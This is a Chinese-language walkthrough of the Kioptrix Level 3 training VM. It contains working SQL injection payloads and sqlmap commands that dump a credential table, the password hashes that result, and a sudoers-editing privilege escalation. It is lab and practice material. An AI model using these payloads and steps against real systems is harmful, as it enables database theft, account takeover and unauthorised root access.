环境准备
靶机链接:百度网盘 请输入提取码
提取码:hjpd
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1.探测目标靶机开放端口和服务情况
nmap -p- -A -T4 192.168.1.101
2.用gobuster进行目录扫描
gobuster dir -u http://192.168.1.101 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 \ -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
漏洞利用
1.访问网页,发现一个域名,添加到/etc/hosts下
2.访问gallery目录
3.随便点点,发现有SQL注入漏洞
4.方法一:(手工注入)
http://kioptrix3.com/gallery/gallery.php?id=1'&sort=photoid#photos http://kioptrix3.com/gallery/gallery.php?id=1 order by 6-- -&sort=photoid#photos http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,2,3,4,5,6-- -&sort=photoid#photos http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,2,database(),4,5,6-- -&sort=photoid#photos union select 1,table_name,3,4,5,6 from information_schema.tables where table_schema = char(103,97,108,108,101,114,121) union select 1,column_name,3,4,5,6 from information_schema.columns where table_name = char(100,101,118,95,97,99,99,111,117,110,116,115) union select 1,username,password,4,5,6 from dev_accounts
1>通过order by判断,字段数为6
kioptrix3.com order by 6-- -&sort=photoid#photos
2>判断回显点
kioptrix3.com union select 1,2,3,4,5,6-- -&sort=photoid#photos
3>查询数据库名为gallery
kioptrix3.com union select 1,2,database(),4,5,6-- -&sort=photoid#photos
4>在查表的时候,要把gallery进行十进制编译
Convert a String to Bytes - Online String Tools
5>查到表名为dev_accounts
union select 1,table_name,3,4,5,6 from information_schema.tables where table_schema = char(103,97,108,108,101,114,121)
6>将表名转换后,查列
union select 1,column_name,3,4,5,6 from information_schema.columns where table_name = char(100,101,118,95,97,99,99,111,117,110,116,115)
7>成功查询到用户名,密码
union select 1,username,password,4,5,6 from dev_accounts
8>用john进行hash解密
dreg 0d3eccfb887aabd50f243b3f155c0f85
loneferret 5badcaf789d3d1d09794d8f021f40f0e
5.方法二:(sqlmap注入)
1>sqlmap -u kioptrix3.com --dbs
2>sqlmap -u kioptrix3.com -D gallery --tables
3>sqlmap -u kioptrix3.com -D gallery -T dev_accounts --columns
4>sqlmap -u kioptrix3.com -D gallery -T dev_accounts -C password,username --dump
权限提升
1.用查出的用户名密码,登录ssh
ssh loneferret@192.168.1.101
starwars
2.执行sudo命令时,报错
3.谷歌Error opening terminal: xterm-256color 找到答案!
export TERM=xterm
4.执行后,进去了一个类似文本编辑的页面
alt + f
etc/sudoers
sudo的权限控制可以在/etc/sudoers文件中查看到。一般来说,通过cat /etc/sudoers指令来查看该文件,修改sudoers
alt + f s q
5.保存后,成功提权!!!